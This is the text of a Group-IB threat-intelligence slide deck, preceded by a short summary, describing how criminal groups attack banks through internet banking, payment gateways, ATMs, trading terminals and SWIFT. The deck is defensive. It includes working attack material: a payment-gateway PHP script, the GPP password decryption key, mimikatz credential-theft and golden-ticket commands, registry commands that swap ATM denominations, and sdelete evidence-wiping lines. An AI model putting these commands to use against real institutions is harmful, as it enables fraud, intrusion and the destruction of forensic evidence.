The document discusses targeted attacks on financial institutions. It provides information on: 1) Known targeted attackers like Cobalt, Corkow, and Anunak and their favorite targets like ATMs, card processing, and SWIFT systems. 2) Future targeted attackers that may go after financial networks. 3) The common targets of these attacks, which include corporate internet banking software, payment gateways, ATMs, trade terminals, and SWIFT/ARM CBR systems. 4) The malware delivery methods used by these groups, such as driveby downloads, pay-per-install, web hacks, phishing emails, and spear phishing.

1. GROUP-IB.COM 11
Hackers want your bank more
than your customers:
The evolution of targeted
attacks on financial
institutions

2. GROUP-IB.COM 22
Who are the attackers?

3. GROUP-IB.COM
Timeline
*Cobalt was detected in June
3

4. GROUP-IB.COM
Who are they? What are their favorite targets?
KNOWN TARGETED ATTACKERS
Buhtrap
ARM CBR (SWIFT analog)
Сobalt
ATM, Card processing, SWIFT
Corkow
Trading terminals,
Card processing, ATM
Anunak
Internet banking, ARM CBR,
SWIFT, Payment gateways,
Card processing, ATM
Lurk
ARM CBR (SWIFT analog)
4

5. GROUP-IB.COM 5
FUTURE TARGETED
ATTACKERS
• Toplel
• Ranbyus
• RTM
• Vawtrak
• Dridex
Balance is 500 thousand pounds,
inter-UK, for money mules (now
such money mules now). Skip for
now.
Account for authorization of
payments, balance is 2 million
pounds
No function of payment approval.
Balance is 18 million pounds.
Tried to transfer 2 million to China
Balance is 15 million pounds, dual
authorization off.
No opportunity to establish sort
code for transfer. It is better to
ring out
Future Attackers after your network

6. GROUP-IB.COM 66
What are the targets?

7. GROUP-IB.COM
Targets: Corporate internet banking software
• Compromise operator workstations
of corporate accounts
• Listing companies with high balances
• Generating new digital signatures
for each company
• Transactions from corporate accounts signed
with new digital signatures
7
Access to corporate internet banking
enables criminals to steal from TOP
clients. Anunak used this method in
2013-2014.

8. GROUP-IB.COM
Targets: Payment gateways
$ses = date("Ymdhis");
$url = "http://ru-demo.cyberplat.com/cgi-
bin/DealerSertification/de_pay.cgi";
$data_string =
"SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=".$ses."&COMM
ENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT
=10.0";
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:
application/x-www-form-urlencoded','Content-Length:
'.strlen($data_string)));
curl_setopt($ch, CURLOPT_POSTFIELDS,
"inputmessage=0000038801SM000001270000012700000125&".$
data_string);
$result = curl_exec($ch);
var_dump($result);
• Once inside, hackers search for payment gateways
• Obtain log files from payment gateways to understand
the typical format of communication
• Start SOCKS proxies on internal hosts to enable
communication with payment gateways
• Run scripts to replenish attacker’s phone balances in
thousands of transactions
• Transfer money from phones to cards and cash out
8
Payment gateways enables high frequency, low
amount transfers. Very hard to stop and return
money.

9. GROUP-IB.COM
Targets: ATM
• Hackers Identify ATM manufactures
• They detect physical ATM locations
• Upload from internal network to ATM
• Jackpot with diagnostic tools
• Jackpot with custom malicious programs for specific ATMs
9
ATM heists – the easiest way to launder money.
Cobalt used malware to withdraw bags cash
totalling $2.6m from 41 ATMS in Taiwan.

10. GROUP-IB.COM
Targets: Trade terminals
• The attack lasted only 14 minutes
• $437 million in purchases (5 trades )
• $97 million sold (2 trades)
• 55 to 66 Rubles — volatility in exchange
rate
10
Corkow conducted the first
successful attack on broker
terminals in 2015.

11. GROUP-IB.COM
Targets: Trade terminals
11

12. GROUP-IB.COM
Targets: ARM CBR or SWIFT
SWIFT
[ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmin
[ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmout
ARM CBR
[ROOT_DRIVE]:uarm3exqinc
[ROOT_DRIVE]:uarm3exqout
• Identify working directory of
SWIFT or ARM CBR application
• Replace payment details with
fraudster’s information
• Intercept confirmation messages
to bypass identification of
fraudulent transactions
12

13. GROUP-IB.COM
Targets: Card processing
• Legally open bank cards in the same
bank or buy new cards on dark
market (usually about 30 cards)
• Remove or increase withdraw limits
• Remove overdraft limits
(even for debit cards)
• Cash out using these cards in other
countries
13
Cobalt, Corkow, Anunak have been conducting
these attacks since 2014.
It provides very important cash-out benefits.

14. GROUP-IB.COM 1414
Malware delivery

15. GROUP-IB.COM
Malware Delivery: Driveby
GROUPS WHICH HAVE USED
THIS METHOD:
• Anunak
• Corkow
• Buhtrap
• Lurk
800 000+ total visitor per day
11% average exploit success rate
90 000 possible infections per day
15

16. GROUP-IB.COM
Malware Delivery: Custom pay-per-install
GROUPS WHICH HAVE USED THIS
METHOD:
• Anunak
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver
iplist_file = 'ip.txt'
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()
iplist = []
with open(os.path.join(path, iplist_file)) as f:
for line in f:
iplist.append(line.strip())
result = bulk_whois.lookup_ips(iplist)
with open(os.path.join(path, 'data.txt'), 'a') as f:
for record in result:
f.write('IP: %s
CC: %s
Org. Name: %s
Register: %s
AS Name: %s
BGP Prefix: %s
-------------------------------------------------------
' % (result[record]['ip'], result[record]['cc'], result[record]['org_name'],
result[record]['register'], result[record]['as_name'],
result[record]['bgp_prefix']))
16
WHAT THEY DID:
• Contact botnet owner
• Ask to provide IPs of infected machines
• Check IP list with script
• Check for records related to financial institutions
• Ask botnet owner to install new trojan

17. GROUP-IB.COM
Malware Delivery: Web hack
17
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak and individual hackers in 2013, 2014, 2015
WHAT THEY DO:
• Identify SQL injection
• Do EXEC in SQL request to gather information about net environment
• Upload files on server with
echo command
downloading from remote host
with Meterpreter
• Upload mimikatz on the Domain Controller
• Create hidden tunnels

18. GROUP-IB.COM
Malware Delivery: Phishing Emails
GROUPS WHICH HAVE
USED THIS METHOD:
• Anunak
• Buhtrap
• Lurk
• Cobalt
• MoneyTaker
METHODS TO ENSURE
DOCUMENTS ARE
OPENED:
• Mass mailing to corporate
email addresses
• Calls to bank managers
• Hacking bank clients
• Hacking bank partners
ATTACHMENTS:
• Executables
• Executables in
encrypted archive
• Document with exploits
• Document with
malicious macros
18

19. GROUP-IB.COM
Malware Delivery: Spear phishing with faked sender address
ADVANTAGES
DISADVANTAGES
• Easy to start
• Unlimited list of brands
• No need to register domains
• Less traces for the investigation
• High level of trust for users
• Hard to detect if email delivered
to end user
• Don’t pass Sender Policy
Framework (SPF) check
• Low delivery percent
19

20. GROUP-IB.COM
ADVANTAGES
DISADVANTAGES
• Can bypass Sender Policy Framework (SPF) check
• New TLD allows registering very similar domains
• High percent of delivery
• Vigilant users can detect it
• Additional traces for investigation
Malware Delivery: Spear phishing with faked sender address
20

21. GROUP-IB.COM
Malware Delivery: Spear phishing from compromised partner
ADVANTAGES
DISADVANTAGES
• Almost 100% delivery with correct attachment
• High percent of opening by users from contact list
• No need to rent server and register domains
• Limited by region where partner is located
21

22. GROUP-IB.COM
Tools to create malicious documents
Microsoft Word Intruder
(MWI)
OffensiveWare Multi Exploit
Builder (OMEB)
22

23. GROUP-IB.COM
The attack scheme
23

24. GROUP-IB.COM 2424
What they do inside your network

25. GROUP-IB.COM
Legal Software vs. Private Tools
New trend: Hackers Use Legal Software for Their Attacks
PRIVATE TOOLS LEGAL SOFTWARE
+
–
Legal attack framework has become very effective. Special trojans are not necessary anymore.
• Unknown before first public research
• Adjusted to the needs of the group
• Easy to use
• Inexperienced attackers can be involved
• Investments in development are needed
• High cost of ownership
• Becomes known quickly
• Dependency on developers
• Attracts attention
• Easier to attribute incidents and threat actors
• Simplifies the process of investigation
• Hard to track such attacks
• Difficult to link different incidents
• Less traces to investigate
• Difficult to detect in a local network
• Higher qualification
• Many solutions are DIY
• Difficult to attack several
targets simultaneously
25

26. GROUP-IB.COM
KSC as a tool for provisioning the malware
26

27. GROUP-IB.COM
KSC as a tool for provision of the RMS and scanning server
27

28. GROUP-IB.COM
Gaining privileges
DOMAIN CONTROLLER
CONFIGURATION ERROR
• Using Group Policy Preferences (GPP)
• [server_name]sysvol[domain_name]Policies[group_policy_nam
e]MachinePreferencesGroupsGroups.xml
• The perpetrators extract domain administrator credentials from the
cpassword and userName fields in the Groups.xml file (the password
is encrypted using the AES-256 algorithm and further coded using
Base64 encoding).
• To obtain an unencrypted password the attackers decode it using
Base64.
• This password is then decrypted using the key
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b
66c1b.
28

29. GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers have access to a domain controller
mimikatz sekurlsa::logonpasswords
If the attackers have local root privileges without
access to a domain controller
The attackers connect to workstations and servers in order to find a user with
access to the domain controller. The attack pass-the-hash can be performed.
29

30. GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers do not have local administrator rights
Exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701,
CVE-2015-2363 and CVE-2015-2426 enables the criminal to gain SYSTEM level
privileges in x32 and x64 operating systems. The malware connects to hosts
andcheck them for necessary vulnerabilities.
MIMIKATZ GOLDEN TICKET
• "privilege::debug" "lsadump::samrpc /patch" exit
• extracting NTLM hash of the krbtgt account
(Key Distribution Center Service Account)
• creating a file with a gold TGT ticket
30

31. GROUP-IB.COM
Tools to research the network
netscan.exe – a network scanner NetScan
patch86.exe – a Termsrv patch to support simultaneous terminal sessions (KEY indicator)
plink.exe – an ssh console client for Windows
psexec.exe – a remote console for Windows
31

32. GROUP-IB.COM
Tools to research the network
REMOTE
ADMINISTRATION TOOLS:
• AmmyAdmin
• TeamViewer or TVRat
• Hamachi LogMeIn
• RMS
• LightManager
• HidenVNC
• Hidden channel over SMB,
DNS, HTTPS
32

33. GROUP-IB.COM
Provision of the trojan survivability
33

34. GROUP-IB.COM 34
Tools to used to complete attacks

35. GROUP-IB.COM
Change denomination of withdrawal banknotes
.bat file from ATM
Registry key name Value
VALUE_1 5000
VALUE_2 1000
VALUE_3 500
VALUE_4 100
• Remote access to ATM from internal network
• Launch .bat script that changed registry keys
• Money mule came to the ATM and withdraw cash from its bank account
• During withdraw he set small denominations
• Instead of small denominations the ATM spit out big denominations
from wrong cassette
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f
shutdown -r -t 0 -f
35

36. GROUP-IB.COM
Modified diagnostic tools
• Attackers disabled the KDIAG function responsible for checking if the door is open.
• Uploaded a modified version of KDIAG to the ATM and sent the command to withdraw cash
• At the same time, a money mule came to the ATM with an open bag to grab money
36

37. GROUP-IB.COM
Software for attacks on ATMs
ServiceLogicalName — a service name used as an argument for the WFSOpen function (for example, “Cash Dispenser Module”).
Cassettes Count — the total number of cassettes on the device. The value should be set in the interval from 1 to 15.
Cassette Number — the number of the cassette, which should dispense cash. The value should be set in the interval from 1 to 15.
Banknotes Count — the amount of banknotes to be dispensed from the cassette. The value should be set in the interval from 1 to 60.
Dispenses Count — the number of times cash dispenses should be repeated. The value should be set in the interval from 1 to 60.
A malicious program that uses standard functions for the XFS interface
via the XFS Manager (eXtensions for Financial Services).
37

38. GROUP-IB.COM
Outward Telegraphic Transfer Comm & Charges
MD5 6D355FFA06AE39FC8671CC8AC38F984E
Searches files in catalog:
D:WIN32APPSWIFTALLIANCESERVERBatchOutgoingHKHKAcksBak
In this instance, «Outgoing» signifies outgoing transactions, «HK» signifies Hong
Kong, accordingly the program searches for transactions to Hong Kong banks.
If file is bigger than 102400 bytes it then attaches into file
C:TempMsglog.txt «Too big file <file name> : <file size> > 102400rn», it
opens and will search substrings: «OTTC605384», «OTTC605385»,
«OTTC601386», «OTTC601387», «OTTC605381», «OTTC605382»
If a file contains this substring, then it writes into log C:TempMsglog.txt
the following string «Found file: %s with required token: <founded
substring>rn» and copies this file into directory «C:TempMsg»
Then it goes into standby mode each 2.5 seconds, and then repeats the search
of the substring.
Hong Kong-based FI
OTTC605384
OTTC605385
OTTC601386
OTTC601387
OTTC605381
OTTC605382
38

39. GROUP-IB.COM
ARM CBR (SWIFT analoge)
MONEYTAKER V5.0
Four modules:
Main – launch other modules with parameters specified in main config file
AutoReplacer (XmlBin) – replaces in ARM CBR directory payment details. Results of
replacement writes to Xml-Resultfile. Do not change SUM field to avoid detection.
Hiding (EdBin) – checks for incoming/confirmation messages. It checks for field
«PayeePersonalAcc» and compare it with «HackAcc» in from Xml-Resultfile.
If the values match, then hiding module restore original PayeePersonalAcc field.
Temp (TxtBin) – unknown.
Xml-Resultfile
#
#
Id=
OrigAcc=
OrigBic=
OrigCor=
Purpose=
HackAcc=
HackBic=
HackCor=
Sum=
PayerPersonalAcc=
#
#
39

40. GROUP-IB.COM
Software to clean evidences
DEL.BAT
sdelete.exe -accepteula -p 32 d2.exe
sdelete.exe -accepteula -p 32 xtl.exe
sdelete.exe -accepteula -p 32 *.txt
sdelete.exe -accepteula -p 32 d2s.exe
del sdelete.exe
del del.bat
The del.bat script launches the SDelete program,
which is designed to delete files in a special
manner making it impossible to recover them
with a forensic investigation.
MBR KILLER
Program deletes Master boot record (MBR)
40

41. GROUP-IB.COM
Future
More criminal groups
Targeted attacks is a new call for attackers who
know about banks and money laundering
More attacks
Global landscape, ready to use tools, technics
and tactics allows to be more effective.
Legal software
We will see much more attacks with use if legal
software without private trojans.
Harder to attribute and investigate
Legal software in attacks will force us to change
attribution and investigation procedures.
41

42. GROUP-IB.COM 4242
Questions?

43. GROUP-IB.COM 4343
E-mail
help@group-ib.com
Web site
www.group-ib.com
Facebook
facebook.com/group-ib
Twitter
twitter.com/groupib_gib